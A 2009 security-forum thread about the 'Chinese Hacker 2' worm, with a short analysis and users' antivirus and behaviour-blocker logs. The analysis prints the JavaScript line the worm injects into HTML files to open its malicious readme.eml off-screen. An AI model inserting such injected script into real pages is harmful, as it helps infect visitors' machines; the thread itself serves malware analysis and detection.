中国黑客2

显示全部楼层 · 发表于 2009-4-8 18:55:17

中国黑客2

   凝逸反毒.修复中国黑客2感染1.0
感染引擎: 修复中国黑客2感染
感染分析指导: ximo,qianwenxiang(卡饭_版主) ,wolfwalk888
Blast
      谢谢卡饭高手的指导!
引擎作者: 凝逸
  病毒名:Worm.ChineseHacker-2(中国黑客2),Email-Worm.Win32.Runouce.b ,W32/Chir-B,蠕虫
功能: 修复中国黑客2感染的EXE,修复网页感染,删除病毒

===========病毒分析=============
   病毒运行后,感染所有exe与htm,在htm目录下生成readme.eml,点htm时会打开readme.eml,

----htm中加入病毒命令-----
<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
-----------

显示全部楼层 · 发表于 2009-4-8 19:01:43

病毒 2009-04-08 19:02:16 C:\Documents and Settings\Administrator\桌面\中国黑客2.rar\中国黑客2/readme.eml Worm.Runouceml.b (蠕虫病毒) 跳过，未处理
病毒 2009-04-08 19:02:16 C:\Documents and Settings\Administrator\桌面\中国黑客2.rar\中国黑客2/MDACReadme.htm JS.Nimda.na (JS脚本病毒) 跳过，未处理

显示全部楼层 · 发表于 2009-4-8 19:05:25

Starting the file scan:

Begin scan in 'D:\kafan\中国黑客2'
D:\kafan\中国黑客2\MDACReadme.htm
[DETECTION] Contains recognition pattern of the HTML/Rce.Gen HTML script virus
[NOTE]    A backup was created as '4a1d859b.qua'  ( QUARANTINE )
[NOTE]    The file was deleted!
D:\kafan\中国黑客2\凝逸反毒.修复中国黑客2感染1.0.txt
[DETECTION] Contains recognition pattern of the HTML/Rce.Gen HTML script virus
[NOTE]    A backup was created as '9daa158f.qua'  ( QUARANTINE )
[NOTE]    The file was deleted!
D:\kafan\中国黑客2\readme.eml
  [0] Archive type: MIME
[DETECTION] Contains recognition pattern of the W32/Runouce.B2 Windows virus
--> file0.html
   [DETECTION] Contains recognition pattern of the EXP/Iframe.B exploit
--> pp.exe
   [DETECTION] Contains recognition pattern of the WORM/RunOnce.B2 worm
[NOTE]    A backup was created as '4a3d85bc.qua'  ( QUARANTINE )
[NOTE]    The file was deleted!
D:\kafan\中国黑客2\感WinRAR.exe
[DETECTION] Contains recognition pattern of the W32/Chir.B Windows virus
[NOTE]    A backup was created as '4a4585ae.qua'  ( QUARANTINE )
[NOTE]    The file was deleted!

End of the scan: 2009年4月8日  19:07
Used time: 00:00 Minute(s)

The scan has been done completely.

   1 Scanned directories
   7 Files were scanned
   6 Viruses and/or unwanted programs were found
   0 Files were classified as suspicious
   4 files were deleted
   0 Viruses and unwanted programs were repaired
   4 Files were moved to quarantine
   0 Files were renamed
   0 Files cannot be scanned
   1 Files not concerned
   1 Archives were scanned
   0 Warnings
   4 Notes

显示全部楼层 · 发表于 2009-4-8 19:09:46

卡巴检测到：病毒 Net-Worm.Win32.Nimda URL: http://bbs.kafan.cn/attachment.p ... amp;t=1239188879//-??/MDACReadme.htm

显示全部楼层 · 发表于 2009-4-8 20:49:40

见鬼了！我用红伞扫面压缩文件，不报，我一解压直接删了！我再扫那压缩文件，还是不报！真是见鬼了！

显示全部楼层 · 发表于 2009-4-8 20:52:45

McAfee 报了3个。。

显示全部楼层 · 发表于 2009-4-8 21:11:02

2009-04-08 21:10:21 创建文件操作:阻止并结束进程
进程路径:E:\virus\中国黑客2\感WinRAR.exe
文件路径:C:\WINDOWS\system32\runouce.exe
触发规则:应用程序规则->02-允许修改的程序->*.*->*\*.exe

2009-04-08 21:10:25 创建注册表值操作:阻止
进程路径:E:\virus\中国黑客2\感WinRAR.exe
注册表路径:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
注册表名称:Runonce
触发规则:所有程序规则->02-注册表启动项保护（黑名单）增强->*\SOFTWARE\Microsoft\Windows\CurrentVersion\Run*

显示全部楼层 · 发表于 2009-4-8 21:17:52

\MDACReadme.htm - infected with JS.Nimda
凝逸反毒.修复中国黑客2感染1.0.txt\JavaScript.0 - infected with JS.Nimda
感WinRAR.exe - infected with Win32.Runonce.6652
TO-1

显示全部楼层 · 发表于 2009-4-8 23:47:40

名称: I-Worm.Chir.B
类型: Virus

描述:

文件:
c:\users\administrator\desktop\感winrar.exe

显示全部楼层 · 发表于 2009-4-9 06:19:52

D:\kafan\中国黑客2\MDACReadme.htm 已检测: Net-Worm.Win32.Nimda!IK
D:\kafan\中国黑客2\凝逸反毒.修复中国黑客2感染1.0.txt 已检测: Net-Worm.Win32.Nimda!IK
D:\kafan\中国黑客2\readme.eml/pp.exe 已检测: Email-Worm.Win32.Runouce.B!IK
D:\kafan\中国黑客2\感WinRAR.exe 已检测: Email-Worm.Win32.Runouce.B!IK

[病毒样本] 中国黑客2

本帖子中包含更多资源

DW